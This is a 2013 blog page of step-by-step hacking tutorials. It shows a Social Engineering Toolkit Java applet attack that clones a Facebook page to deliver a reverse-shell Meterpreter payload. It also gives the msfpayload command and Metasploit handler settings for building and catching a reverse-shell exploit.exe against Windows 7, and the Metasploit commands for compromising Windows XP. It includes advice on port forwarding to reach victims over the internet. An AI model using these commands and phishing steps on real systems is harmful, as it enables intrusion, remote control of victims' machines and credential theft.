Skip to main content

Posts

Showing posts from October, 2013

Social Engineering Toolkit

Java Applet Attack(using SET) CYBERATOR Step 1:             Start the SET(Social Engg. Toolkit) and select option 1 Step 2:             Now select option number 2 Step 3:              Now select "java applet attack method" Step 4:            Select website template. If you want to copy any website, you can use the second option also. Step 5:            Now provide your local IP address. If you are conducting the attack on WAN you must do port forwarding first and provide your public IP instead. Step 6:            I have selected Website template option so I'm having a list of built in templates. Choose any of the following...I have selected facebook Then select the Payload that you want to be executed: Windows Reverse_TCP Meterpreter Step 7:             Select the Encryption type and Set the PORT number and press Return: Step 8:            Startup the Victim PC : Windows 7 ultimate 6

Exploiting Windows 7

Hacking Windows 7 using Metasploit CYBERATOR Step 1:       Boot Windows 7 in virtual Box: Step 2:         Start a new Terminal and type the following command: msfpayload windows/meterpreter/reverse_tcp lhost=<attacker's IP> lport=4444 x>exploit.exe Step 3:      Start a new terminal and type " msfconsole ". Now type following commands: use exploit/multi/handler set lhost <Attacker's IP> set lport 4444 set payload windows/meterpreter/reverse_tcp exploit Step 4:      Open up windows 7 machine and run the exploit.exe which we created.      You can make your exploit accessible over the network using Apache     server Step 5: Run the exploit...we will get a meterpreter session opened. Type following commands: sysinfo getprivs....etc

OLD School ☺

Hacking Windows XP(Sp1,Sp2) Step 1:        Boot up Windows Xp(Sp1,Sp2) in virtual box: Step 2:       Open a new terminal and type " msfconsole " Step 3:        Type Following commands: set payload windows/meterpreter/reverse_tcp set lhost <attacker IP address> set rhost <victim's IP address> set lport 4444 exploit Step 4: After getting the meterpreter session type "sysinfo" to view the victim's detail.